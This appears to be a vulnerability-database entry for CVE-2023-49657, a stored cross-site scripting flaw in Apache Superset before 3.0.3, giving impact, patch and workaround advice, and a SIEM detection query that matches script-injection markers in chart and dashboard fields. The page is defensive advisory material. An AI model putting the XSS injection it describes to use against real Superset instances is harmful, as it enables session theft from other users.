Login Sign Up

CVE-2023-49657

9.6 CRITICAL
Cross-Site Scripting

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in Apache Superset allows authenticated attackers with create/update permissions to inject malicious scripts into charts or dashboards. When other users view these compromised elements, the attacker's scripts execute in their browser context. This affects all Apache Superset instances before version 3.0.3.

💻 Affected Systems

Products:
  • Apache Superset
Versions: All versions before 3.0.3
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user with create/update permissions on charts or dashboards. Default configurations are vulnerable.

📦 What is this software?

Superset by Apache

View all CVEs affecting Superset →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or compromise user accounts and data.

🟠

Likely Case

Attackers with legitimate permissions abuse their access to inject scripts that steal session tokens or perform unauthorized actions on behalf of other users.

🟢

If Mitigated

With proper Content Security Policy (CSP) configurations and input validation, script execution would be blocked, limiting impact to potential data corruption.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is technically simple once permissions are obtained. Stored XSS payloads persist until removed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.3

Vendor Advisory: https://lists.apache.org/thread/wjyvz8om9nwd396lh0bt156mtwjxpsvx

Restart Required: Yes

Instructions:

1. Upgrade Apache Superset to version 3.0.3 or later. 2. Restart the Superset service. 3. Verify the upgrade completed successfully.

🔧 Temporary Workarounds

Implement Content Security Policy for 2.X versions

all

Add the provided TALISMAN_CONFIG to your Superset configuration to restrict script execution

Add the TALISMAN_CONFIG dictionary to your superset_config.py file

🧯 If You Can't Patch

  • Restrict user permissions to minimize who can create/update charts and dashboards
  • Implement web application firewall (WAF) rules to detect and block XSS payloads

🔍 How to Verify

Check if Vulnerable:

Check your Apache Superset version. If it's below 3.0.3, you are vulnerable.

Check Version:

superset version

Verify Fix Applied:

Verify version is 3.0.3 or higher and test that script injection in chart/dashboard fields is properly sanitized.

📡 Detection & Monitoring

Log Indicators:

  • Unusual chart/dashboard creation/modification patterns
  • JavaScript or HTML snippets in chart/dashboard metadata fields

Network Indicators:

  • Unexpected outbound connections from Superset user sessions
  • Suspicious script loading in HTTP responses

SIEM Query:

source="superset" AND (event="chart_create" OR event="dashboard_update") AND (payload CONTAINS "<script>" OR payload CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2023-49657
CVSS v3 Score: 9.6 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
CWE: CWE-79
Published: January 23, 2024
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-49657, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)